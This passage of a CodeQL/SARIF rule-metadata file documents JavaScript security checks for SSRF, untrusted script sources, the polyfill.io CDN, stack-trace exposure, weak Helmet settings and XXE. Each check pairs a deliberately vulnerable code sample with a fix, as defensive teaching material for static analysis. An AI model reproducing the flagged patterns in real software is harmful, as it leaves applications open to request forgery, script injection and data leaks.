[CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n"},"properties":{"tags":["security","external/cwe/cwe-400"],"description":"Processing user-controlled object hierarchies inefficiently can lead to denial of service.","id":"js/resource-exhaustion-from-deep-object-traversal","kind":"path-problem","name":"Resources exhaustion from deep object traversal","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/request-forgery","name":"js/request-forgery","shortDescription":{"text":"Server-side request forgery"},"fullDescription":{"text":"Making a network request with user-controlled data in the URL allows for request forgery attacks."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Server-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. If the server performing the request is connected to an internal network, this can give an attacker the means to bypass the network boundary and make requests against internal services. A forged request may perform an unintended action on behalf of the attacker, or cause information leak if redirected to an external server or if the request response is fed back to the user. It may also compromise the server making the request, if the request response is handled in an unsafe way.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request parameter being used directly in the URL of a request without validating the input, which facilitates an SSRF attack. The request `http.get(...)` is vulnerable since attackers can choose the value of `target` to be anything they want. For instance, the attacker can choose `\"internal.example.com/#\"` as the target, causing the URL used in the request to be `\"https://internal.example.com/#.example.com/data\"`.\n\nA request to `https://internal.example.com` may be problematic if that server is not meant to be directly accessible from the attacker's machine.\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n    const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n    // BAD: `target` is controlled by the attacker\n    http.get('https://' + target + \".example.com/data/\", res => {\n        // process request response ...\n    });\n\n});\n\n```\nOne way to remedy the problem is to use the user input to select a known fixed string before performing the request:\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n    const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n    let subdomain;\n    if (target === 'EU') {\n        subdomain = \"europe\"\n    } else {\n        subdomain = \"world\"\n    }\n\n    // GOOD: `subdomain` is controlled by the server\n    http.get('https://' + subdomain + \".example.com/data/\", res => {\n        // process request response ...\n    });\n\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n","markdown":"# Server-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. If the server performing the request is connected to an internal network, this can give an attacker the means to bypass the network boundary and make requests against internal services. A forged request may perform an unintended action on behalf of the attacker, or cause information leak if redirected to an external server or if the request response is fed back to the user. It may also compromise the server making the request, if the request response is handled in an unsafe way.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request parameter being used directly in the URL of a request without validating the input, which facilitates an SSRF attack. The request `http.get(...)` is vulnerable since attackers can choose the value of `target` to be anything they want. For instance, the attacker can choose `\"internal.example.com/#\"` as the target, causing the URL used in the request to be `\"https://internal.example.com/#.example.com/data\"`.\n\nA request to `https://internal.example.com` may be problematic if that server is not meant to be directly accessible from the attacker's machine.\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n    const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n    // BAD: `target` is controlled by the attacker\n    http.get('https://' + target + \".example.com/data/\", res => {\n        // process request response ...\n    });\n\n});\n\n```\nOne way to remedy the problem is to use the user input to select a known fixed string before performing the request:\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n    const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n    let subdomain;\n    if (target === 'EU') {\n        subdomain = \"europe\"\n    } else {\n        subdomain = \"world\"\n    }\n\n    // GOOD: `subdomain` is controlled by the server\n    http.get('https://' + subdomain + \".example.com/data/\", res => {\n        // process request response ...\n    });\n\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n"},"properties":{"tags":["security","external/cwe/cwe-918"],"description":"Making a network request with user-controlled data in the URL allows for request forgery attacks.","id":"js/request-forgery","kind":"path-problem","name":"Server-side request forgery","precision":"high","problem.severity":"error","security-severity":"9.1"}},{"id":"js/functionality-from-untrusted-source","name":"js/functionality-from-untrusted-source","shortDescription":{"text":"Inclusion of functionality from an untrusted source"},"fullDescription":{"text":"Including functionality from an untrusted source may allow an attacker to control the functionality and execute arbitrary code."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Inclusion of functionality from an untrusted source\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. When including an external resource (for example, a `script` element or an `iframe` element) on a page, it is important to ensure that the received data is not malicious.\n\nWhen including external resources, it is possible to verify that the responding server is the intended one by using an `https` URL. This prevents a MITM (man-in-the-middle) attack where an attacker might have been able to spoof a server response.\n\nEven when `https` is used, an attacker might still compromise the server. When you use a `script` element, you can check for subresource integrity - that is, you can check the contents of the data received by supplying a cryptographic digest of the expected sources to the `script` element. The script will only load sources that match the digest and an attacker will be unable to modify the script even when the server is compromised.\n\nSubresource integrity (SRI) checking is commonly recommended when importing a fixed version of a library - for example, from a CDN (content-delivery network). Then, the fixed digest of that version of the library can easily be added to the `script` element's `integrity` attribute.\n\nA dynamic service cannot be easily used with SRI. Nevertheless, it is possible to list multiple acceptable SHA hashes in the `integrity` attribute, such as those for the content generated for major browers used by your users.\n\nSee the \\[\\`CUSTOMIZING.md\\`\\](https://github.com/github/codeql/blob/main/javascript/ql/src/Security/CWE-830/CUSTOMIZING.md) file in the source code for this query for information on how to extend the list of hostnames required to use SRI by this query.\n\n\n## Recommendation\nWhen an `iframe` element is used to embed a page, it is important to use an `https` URL.\n\nWhen using a `script` element to load a script, it is important to use an `https` URL and to consider checking subresource integrity.\n\n\n## Example\nThe following example loads the jQuery library from the jQuery CDN without using `https` and without checking subresource integrity.\n\n\n```html\n<html>\n    <head>\n        <title>jQuery demo</title>\n        <script src=\"http://code.jquery.com/jquery-3.6.0.slim.min.js\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\nInstead, loading jQuery from the same domain using `https` and checking subresource integrity is recommended, as in the next example.\n\n\n```html\n<html>\n    <head>\n        <title>jQuery demo</title>\n        <script src=\"https://code.jquery.com/jquery-3.6.0.slim.min.js\" integrity=\"sha256-u7e5khyithlIdTpu22PHhENmPcRdFiHRjhAuHcs05RI=\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\n\n## References\n* MDN: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Smashing Magazine: [Understanding Subresource Integrity](https://www.smashingmagazine.com/2019/04/understanding-subresource-integrity/)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n","markdown":"# Inclusion of functionality from an untrusted source\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. When including an external resource (for example, a `script` element or an `iframe` element) on a page, it is important to ensure that the received data is not malicious.\n\nWhen including external resources, it is possible to verify that the responding server is the intended one by using an `https` URL. This prevents a MITM (man-in-the-middle) attack where an attacker might have been able to spoof a server response.\n\nEven when `https` is used, an attacker might still compromise the server. When you use a `script` element, you can check for subresource integrity - that is, you can check the contents of the data received by supplying a cryptographic digest of the expected sources to the `script` element. The script will only load sources that match the digest and an attacker will be unable to modify the script even when the server is compromised.\n\nSubresource integrity (SRI) checking is commonly recommended when importing a fixed version of a library - for example, from a CDN (content-delivery network). Then, the fixed digest of that version of the library can easily be added to the `script` element's `integrity` attribute.\n\nA dynamic service cannot be easily used with SRI. Nevertheless, it is possible to list multiple acceptable SHA hashes in the `integrity` attribute, such as those for the content generated for major browers used by your users.\n\nSee the \\[\\`CUSTOMIZING.md\\`\\](https://github.com/github/codeql/blob/main/javascript/ql/src/Security/CWE-830/CUSTOMIZING.md) file in the source code for this query for information on how to extend the list of hostnames required to use SRI by this query.\n\n\n## Recommendation\nWhen an `iframe` element is used to embed a page, it is important to use an `https` URL.\n\nWhen using a `script` element to load a script, it is important to use an `https` URL and to consider checking subresource integrity.\n\n\n## Example\nThe following example loads the jQuery library from the jQuery CDN without using `https` and without checking subresource integrity.\n\n\n```html\n<html>\n    <head>\n        <title>jQuery demo</title>\n        <script src=\"http://code.jquery.com/jquery-3.6.0.slim.min.js\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\nInstead, loading jQuery from the same domain using `https` and checking subresource integrity is recommended, as in the next example.\n\n\n```html\n<html>\n    <head>\n        <title>jQuery demo</title>\n        <script src=\"https://code.jquery.com/jquery-3.6.0.slim.min.js\" integrity=\"sha256-u7e5khyithlIdTpu22PHhENmPcRdFiHRjhAuHcs05RI=\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\n\n## References\n* MDN: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Smashing Magazine: [Understanding Subresource Integrity](https://www.smashingmagazine.com/2019/04/understanding-subresource-integrity/)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n"},"properties":{"tags":["security","external/cwe/cwe-830"],"description":"Including functionality from an untrusted source may allow\n              an attacker to control the functionality and execute arbitrary code.","id":"js/functionality-from-untrusted-source","kind":"problem","name":"Inclusion of functionality from an untrusted source","precision":"high","problem.severity":"warning","security-severity":"6.0"}},{"id":"js/functionality-from-untrusted-domain","name":"js/functionality-from-untrusted-domain","shortDescription":{"text":"Untrusted domain used in script or other content"},"fullDescription":{"text":"Using a resource from an untrusted or compromised domain makes your code vulnerable to receiving malicious code."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Untrusted domain used in script or other content\nContent Delivery Networks (CDNs) are used to deliver content to users quickly and efficiently. However, they can change hands or be operated by untrustworthy owners, risking the security of the sites that use them. Some CDN domains are operated by entities that have used CDNs to deliver malware, which this query identifies.\n\nFor example, `polyfill.io` was a popular JavaScript CDN, used to support new web browser standards on older browsers. In February 2024 the domain was sold, and in June 2024 it was publicised that the domain had been used to serve malicious scripts. It was taken down later in that month, leaving a window where sites that used the service could have been compromised. The same operator runs several other CDNs, undermining trust in those too.\n\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. When including an external resource (for example, a `script` element) on a page, it is important to ensure that the received data is not malicious.\n\nEven when `https` is used, an untrustworthy operator might deliver malware.\n\nSee the \\[\\`CUSTOMIZING.md\\`\\](https://github.com/github/codeql/blob/main/javascript/ql/src/Security/CWE-830/CUSTOMIZING.md) file in the source code for this query for information on how to extend the list of untrusted domains used by this query.\n\n\n## Recommendation\nCarefully research the ownership of a Content Delivery Network (CDN) before using it in your application.\n\nIf you find code that originated from an untrusted domain in your application, you should review your logs to check for compromise.\n\nTo help mitigate the risk of including a script that could be compromised in the future, consider whether you need to use polyfill or another library at all. Modern browsers do not require a polyfill, and other popular libraries were made redundant by enhancements to HTML 5.\n\nIf you do need a polyfill service or library, move to using a CDN that you trust.\n\nWhen you use a `script` or `link` element, you should check for [subresource integrity (SRI)](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity), and pin to a hash of a version of the service that you can trust (for example, because you have audited it for security and unwanted features). A dynamic service cannot be easily used with SRI. Nevertheless, it is possible to list multiple acceptable SHA hashes in the `integrity` attribute, such as hashes for the content required for the major browsers used by your users.\n\nYou can also choose to self-host an uncompromised version of the service or library.\n\n\n## Example\nThe following example loads the Polyfill.io library from the `polyfill.io` CDN. This use was open to malicious scripts being served by the CDN.\n\n\n```html\n<html>\n    <head>\n        <title>Polyfill.io demo</title>\n        <script src=\"https://cdn.polyfill.io/v2/polyfill.min.js\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\nInstead, load the Polyfill library from a trusted CDN, as in the next example:\n\n\n```html\n<html>\n    <head>\n        <title>Polyfill demo - Cloudflare hosted with pinned version (but no integrity checking, since it is dynamically generated)</title>\n        <script src=\"https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js?version=4.8.0\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\nIf you know which browsers are used by the majority of your users, you can list the hashes of the polyfills for those browsers:\n\n\n```html\n<html>\n    <head>\n        <title>Polyfill demo - Cloudflare hosted with pinned version (with integrity checking for a *very limited* browser set - just an example!)</title>\n        <script src=\"https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js?version=4.8.0\" integrity=\"sha384-i0IGVuZBkKZqwXTD4CH4kcksIbFx7WKFMdxN8zUhLFHpLdELF0ym0jxa6UvLhW8/ sha384-3d4jRKquKl90C9aFG+eH4lPJmtbPHgACWHrp+VomFOxF8lzx2jxqeYkhpRg18UWC\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\n\n## References\n* Sansec: [Polyfill supply chain attack hits 100K+ sites](https://sansec.io/research/polyfill-supply-chain-attack)\n* Cloudflare: [Upgrade the web. Automatically. Delivers only the polyfills required by the user's web browser.](https://cdnjs.cloudflare.com/polyfill)\n* Fastly: [New options for Polyfill.io users](https://community.fastly.com/t/new-options-for-polyfill-io-users/2540)\n* Wikipedia: [Polyfill (programming)](https://en.wikipedia.org/wiki/Polyfill_(programming))\n* MDN Web Docs: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n","markdown":"# Untrusted domain used in script or other content\nContent Delivery Networks (CDNs) are used to deliver content to users quickly and efficiently. However, they can change hands or be operated by untrustworthy owners, risking the security of the sites that use them. Some CDN domains are operated by entities that have used CDNs to deliver malware, which this query identifies.\n\nFor example, `polyfill.io` was a popular JavaScript CDN, used to support new web browser standards on older browsers. In February 2024 the domain was sold, and in June 2024 it was publicised that the domain had been used to serve malicious scripts. It was taken down later in that month, leaving a window where sites that used the service could have been compromised. The same operator runs several other CDNs, undermining trust in those too.\n\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. When including an external resource (for example, a `script` element) on a page, it is important to ensure that the received data is not malicious.\n\nEven when `https` is used, an untrustworthy operator might deliver malware.\n\nSee the \\[\\`CUSTOMIZING.md\\`\\](https://github.com/github/codeql/blob/main/javascript/ql/src/Security/CWE-830/CUSTOMIZING.md) file in the source code for this query for information on how to extend the list of untrusted domains used by this query.\n\n\n## Recommendation\nCarefully research the ownership of a Content Delivery Network (CDN) before using it in your application.\n\nIf you find code that originated from an untrusted domain in your application, you should review your logs to check for compromise.\n\nTo help mitigate the risk of including a script that could be compromised in the future, consider whether you need to use polyfill or another library at all. Modern browsers do not require a polyfill, and other popular libraries were made redundant by enhancements to HTML 5.\n\nIf you do need a polyfill service or library, move to using a CDN that you trust.\n\nWhen you use a `script` or `link` element, you should check for [subresource integrity (SRI)](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity), and pin to a hash of a version of the service that you can trust (for example, because you have audited it for security and unwanted features). A dynamic service cannot be easily used with SRI. Nevertheless, it is possible to list multiple acceptable SHA hashes in the `integrity` attribute, such as hashes for the content required for the major browsers used by your users.\n\nYou can also choose to self-host an uncompromised version of the service or library.\n\n\n## Example\nThe following example loads the Polyfill.io library from the `polyfill.io` CDN. This use was open to malicious scripts being served by the CDN.\n\n\n```html\n<html>\n    <head>\n        <title>Polyfill.io demo</title>\n        <script src=\"https://cdn.polyfill.io/v2/polyfill.min.js\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\nInstead, load the Polyfill library from a trusted CDN, as in the next example:\n\n\n```html\n<html>\n    <head>\n        <title>Polyfill demo - Cloudflare hosted with pinned version (but no integrity checking, since it is dynamically generated)</title>\n        <script src=\"https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js?version=4.8.0\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\nIf you know which browsers are used by the majority of your users, you can list the hashes of the polyfills for those browsers:\n\n\n```html\n<html>\n    <head>\n        <title>Polyfill demo - Cloudflare hosted with pinned version (with integrity checking for a *very limited* browser set - just an example!)</title>\n        <script src=\"https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js?version=4.8.0\" integrity=\"sha384-i0IGVuZBkKZqwXTD4CH4kcksIbFx7WKFMdxN8zUhLFHpLdELF0ym0jxa6UvLhW8/ sha384-3d4jRKquKl90C9aFG+eH4lPJmtbPHgACWHrp+VomFOxF8lzx2jxqeYkhpRg18UWC\" crossorigin=\"anonymous\"></script>\n    </head>\n    <body>\n        ...\n    </body>\n</html>\n```\n\n## References\n* Sansec: [Polyfill supply chain attack hits 100K+ sites](https://sansec.io/research/polyfill-supply-chain-attack)\n* Cloudflare: [Upgrade the web. Automatically. Delivers only the polyfills required by the user's web browser.](https://cdnjs.cloudflare.com/polyfill)\n* Fastly: [New options for Polyfill.io users](https://community.fastly.com/t/new-options-for-polyfill-io-users/2540)\n* Wikipedia: [Polyfill (programming)](https://en.wikipedia.org/wiki/Polyfill_(programming))\n* MDN Web Docs: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n"},"properties":{"tags":["security","external/cwe/cwe-830"],"description":"Using a resource from an untrusted or compromised domain makes your code vulnerable to receiving malicious code.","id":"js/functionality-from-untrusted-domain","kind":"problem","name":"Untrusted domain used in script or other content","precision":"high","problem.severity":"error","security-severity":"7.2"}},{"id":"js/stack-trace-exposure","name":"js/stack-trace-exposure","shortDescription":{"text":"Information exposure through a stack trace"},"fullDescription":{"text":"Propagating stack trace information to an external user can unintentionally reveal implementation details that are useful to an attacker for developing a subsequent exploit."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Information exposure through a stack trace\nSoftware developers often add stack traces to error messages, as a debugging aid. Whenever that error message occurs for an end user, the developer can use the stack trace to help identify how to fix the problem. In particular, stack traces can tell the developer more about the sequence of events that led to a failure, as opposed to merely the final state of the software when the error occurred.\n\nUnfortunately, the same information can be useful to an attacker. The sequence of function names in a stack trace can reveal the structure of the application as well as any internal components it relies on. Furthermore, the error message at the top of a stack trace can include information such as server-side file names and SQL code that the application relies on, allowing an attacker to fine-tune a subsequent injection attack.\n\n\n## Recommendation\nSend the user a more generic error message that reveals less information. Either suppress the stack trace entirely, or log it only on the server.\n\n\n## Example\nIn the following example, an exception is caught and its stack trace is sent back to the remote user as part of the HTTP response. As such, the user is able to see a detailed stack trace, which may contain sensitive information.\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n  var body;\n  try {\n    body = handleRequest(req);\n  }\n  catch (err) {\n    res.statusCode = 500;\n    res.setHeader(\"Content-Type\", \"text/plain\");\n    res.end(err.stack); // NOT OK\n    return;\n  }\n  res.statusCode = 200;\n  res.setHeader(\"Content-Type\", \"application/json\");\n  res.setHeader(\"Content-Length\", body.length);\n  res.end(body);\n}).listen(3000);\n\n```\nInstead, the stack trace should be logged only on the server. That way, the developers can still access and use the error log, but remote users will not see the information:\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n  var body;\n  try {\n    body = handleRequest(req);\n  }\n  catch (err) {\n    res.statusCode = 500;\n    res.setHeader(\"Content-Type\", \"text/plain\");\n    log(\"Exception occurred\", err.stack);\n    res.end(\"An exception occurred\"); // OK\n    return;\n  }\n  res.statusCode = 200;\n  res.setHeader(\"Content-Type\", \"application/json\");\n  res.setHeader(\"Content-Length\", body.length);\n  res.end(body);\n}).listen(3000);\n\n```\n\n## References\n* OWASP: [Improper Error Handling](https://owasp.org/www-community/Improper_Error_Handling).\n* Common Weakness Enumeration: [CWE-209](https://cwe.mitre.org/data/definitions/209.html).\n* Common Weakness Enumeration: [CWE-497](https://cwe.mitre.org/data/definitions/497.html).\n","markdown":"# Information exposure through a stack trace\nSoftware developers often add stack traces to error messages, as a debugging aid. Whenever that error message occurs for an end user, the developer can use the stack trace to help identify how to fix the problem. In particular, stack traces can tell the developer more about the sequence of events that led to a failure, as opposed to merely the final state of the software when the error occurred.\n\nUnfortunately, the same information can be useful to an attacker. The sequence of function names in a stack trace can reveal the structure of the application as well as any internal components it relies on. Furthermore, the error message at the top of a stack trace can include information such as server-side file names and SQL code that the application relies on, allowing an attacker to fine-tune a subsequent injection attack.\n\n\n## Recommendation\nSend the user a more generic error message that reveals less information. Either suppress the stack trace entirely, or log it only on the server.\n\n\n## Example\nIn the following example, an exception is caught and its stack trace is sent back to the remote user as part of the HTTP response. As such, the user is able to see a detailed stack trace, which may contain sensitive information.\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n  var body;\n  try {\n    body = handleRequest(req);\n  }\n  catch (err) {\n    res.statusCode = 500;\n    res.setHeader(\"Content-Type\", \"text/plain\");\n    res.end(err.stack); // NOT OK\n    return;\n  }\n  res.statusCode = 200;\n  res.setHeader(\"Content-Type\", \"application/json\");\n  res.setHeader(\"Content-Length\", body.length);\n  res.end(body);\n}).listen(3000);\n\n```\nInstead, the stack trace should be logged only on the server. That way, the developers can still access and use the error log, but remote users will not see the information:\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n  var body;\n  try {\n    body = handleRequest(req);\n  }\n  catch (err) {\n    res.statusCode = 500;\n    res.setHeader(\"Content-Type\", \"text/plain\");\n    log(\"Exception occurred\", err.stack);\n    res.end(\"An exception occurred\"); // OK\n    return;\n  }\n  res.statusCode = 200;\n  res.setHeader(\"Content-Type\", \"application/json\");\n  res.setHeader(\"Content-Length\", body.length);\n  res.end(body);\n}).listen(3000);\n\n```\n\n## References\n* OWASP: [Improper Error Handling](https://owasp.org/www-community/Improper_Error_Handling).\n* Common Weakness Enumeration: [CWE-209](https://cwe.mitre.org/data/definitions/209.html).\n* Common Weakness Enumeration: [CWE-497](https://cwe.mitre.org/data/definitions/497.html).\n"},"properties":{"tags":["security","external/cwe/cwe-209","external/cwe/cwe-497"],"description":"Propagating stack trace information to an external user can\n              unintentionally reveal implementation details that are useful\n              to an attacker for developing a subsequent exploit.","id":"js/stack-trace-exposure","kind":"path-problem","name":"Information exposure through a stack trace","precision":"very-high","problem.severity":"warning","security-severity":"5.4"}},{"id":"js/insecure-helmet-configuration","name":"js/insecure-helmet-configuration","shortDescription":{"text":"Insecure configuration of Helmet security middleware"},"fullDescription":{"text":"The Helmet middleware is used to set security-related HTTP headers in Express applications. This query finds instances where the middleware is configured with important security features disabled."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Insecure configuration of Helmet security middleware\n[Helmet](https://helmetjs.github.io/) is a collection of middleware functions for securing Express apps. It sets various HTTP headers to guard against common web vulnerabilities. This query detects Helmet misconfigurations that can lead to security vulnerabilities, specifically:\n\n* Disabling frame protection\n* Disabling Content Security Policy\nContent Security Policy (CSP) helps spot and prevent injection attacks such as Cross-Site Scripting (XSS). Removing frame protections exposes an application to attacks such as clickjacking, where an attacker can trick a user into clicking on a button or link on a targeted page when they intended to click on the page carrying out the attack.\n\nUsers of the query can extend the set of required Helmet features by adding additional checks for them, using CodeQL [data extensions](https://codeql.github.com/docs/codeql-language-guides/customizing-library-models-for-javascript/) in a [CodeQL model pack](https://docs.github.com/en/code-security/codeql-cli/using-the-advanced-functionality-of-the-codeql-cli/creating-and-working-with-codeql-packs#creating-a-codeql-model-pack). See `CUSTOMIZING.md` in the query source for more information.\n\n\n## Recommendation\nTo help mitigate these vulnerabilities, ensure that the following Helmet functions are not disabled, and are configured appropriately to your application:\n\n* `frameguard`\n* `contentSecurityPolicy`\n\n## Example\nThe following code snippet demonstrates Helmet configured in an insecure manner:\n\n\n```javascript\nconst helmet = require('helmet');\n\napp.use(helmet({\n    frameguard: false,\n    contentSecurityPolicy: false\n}));\n```\nIn this example, the defaults are used, which enables frame protection and a default Content Security Policy.\n\n\n```javascript\napp.use(helmet());\n```\nYou can also enable a custom Content Security Policy by passing an object to the `contentSecurityPolicy` key. For example, taken from the [Helmet docs](https://helmetjs.github.io/#content-security-policy):\n\n\n```javascript\napp.use(\n    helmet({\n        contentSecurityPolicy: {\n            directives: {\n                \"script-src\": [\"'self'\", \"example.com\"],\n                \"style-src\": null,\n            },\n        },\n    })\n);\n```\n\n## References\n* [helmet.js website](https://helmetjs.github.io/)\n* [Content Security Policy (CSP) | MDN](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy)\n* [Mozilla Web Security Guidelines](https://infosec.mozilla.org/guidelines/web_security)\n* [Protect against clickjacking | MDN](https://developer.mozilla.org/en-US/docs/Web/Security#protect_against_clickjacking)\n* Common Weakness Enumeration: [CWE-693](https://cwe.mitre.org/data/definitions/693.html).\n* Common Weakness Enumeration: [CWE-1021](https://cwe.mitre.org/data/definitions/1021.html).\n","markdown":"# Insecure configuration of Helmet security middleware\n[Helmet](https://helmetjs.github.io/) is a collection of middleware functions for securing Express apps. It sets various HTTP headers to guard against common web vulnerabilities. This query detects Helmet misconfigurations that can lead to security vulnerabilities, specifically:\n\n* Disabling frame protection\n* Disabling Content Security Policy\nContent Security Policy (CSP) helps spot and prevent injection attacks such as Cross-Site Scripting (XSS). Removing frame protections exposes an application to attacks such as clickjacking, where an attacker can trick a user into clicking on a button or link on a targeted page when they intended to click on the page carrying out the attack.\n\nUsers of the query can extend the set of required Helmet features by adding additional checks for them, using CodeQL [data extensions](https://codeql.github.com/docs/codeql-language-guides/customizing-library-models-for-javascript/) in a [CodeQL model pack](https://docs.github.com/en/code-security/codeql-cli/using-the-advanced-functionality-of-the-codeql-cli/creating-and-working-with-codeql-packs#creating-a-codeql-model-pack). See `CUSTOMIZING.md` in the query source for more information.\n\n\n## Recommendation\nTo help mitigate these vulnerabilities, ensure that the following Helmet functions are not disabled, and are configured appropriately to your application:\n\n* `frameguard`\n* `contentSecurityPolicy`\n\n## Example\nThe following code snippet demonstrates Helmet configured in an insecure manner:\n\n\n```javascript\nconst helmet = require('helmet');\n\napp.use(helmet({\n    frameguard: false,\n    contentSecurityPolicy: false\n}));\n```\nIn this example, the defaults are used, which enables frame protection and a default Content Security Policy.\n\n\n```javascript\napp.use(helmet());\n```\nYou can also enable a custom Content Security Policy by passing an object to the `contentSecurityPolicy` key. For example, taken from the [Helmet docs](https://helmetjs.github.io/#content-security-policy):\n\n\n```javascript\napp.use(\n    helmet({\n        contentSecurityPolicy: {\n            directives: {\n                \"script-src\": [\"'self'\", \"example.com\"],\n                \"style-src\": null,\n            },\n        },\n    })\n);\n```\n\n## References\n* [helmet.js website](https://helmetjs.github.io/)\n* [Content Security Policy (CSP) | MDN](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy)\n* [Mozilla Web Security Guidelines](https://infosec.mozilla.org/guidelines/web_security)\n* [Protect against clickjacking | MDN](https://developer.mozilla.org/en-US/docs/Web/Security#protect_against_clickjacking)\n* Common Weakness Enumeration: [CWE-693](https://cwe.mitre.org/data/definitions/693.html).\n* Common Weakness Enumeration: [CWE-1021](https://cwe.mitre.org/data/definitions/1021.html).\n"},"properties":{"tags":["security","external/cwe/cwe-693","external/cwe/cwe-1021"],"description":"The Helmet middleware is used to set security-related HTTP headers in Express applications. This query finds instances where the middleware is configured with important security features disabled.","id":"js/insecure-helmet-configuration","kind":"problem","name":"Insecure configuration of Helmet security middleware","precision":"high","problem.severity":"error","security-severity":"7.0"}},{"id":"js/xxe","name":"js/xxe","shortDescription":{"text":"XML external entity expansion"},"fullDescription":{"text":"Parsing user input as an XML document with external entity expansion is vulnerable to XXE attacks."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# XML external entity expansion\nParsing untrusted XML files with a weakly configured XML parser may lead to an XML External Entity (XXE) attack. This type of attack uses external entity references to access arbitrary files on a system, carry out denial-of-service (DoS) attacks, or server-side request forgery. Even when the result of parsing is not returned to the user, DoS attacks are still possible and out-of-band data retrieval techniques may allow attackers to steal sensitive data.\n\n\n## Recommendation\nThe easiest way to prevent XXE attacks is to disable external entity handling when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxml`, disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action needs to be taken.\n\n\n## Example\nThe following example uses the `libxml` XML parser to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to an XXE attack, since the parser is invoked with the `noent` option set to `true`:\n\n\n```javascript\nconst app = require(\"express\")(),\n  libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n  let xmlSrc = req.body,\n    doc = libxml.parseXml(xmlSrc, { noent: true });\n});\n\n```\nTo guard against XXE attacks, the `noent` option should be omitted or set to `false`. This means that no entity expansion is undertaken at all, not even for standard internal entities such as `&amp;` or `&gt;`. If desired, these entities can 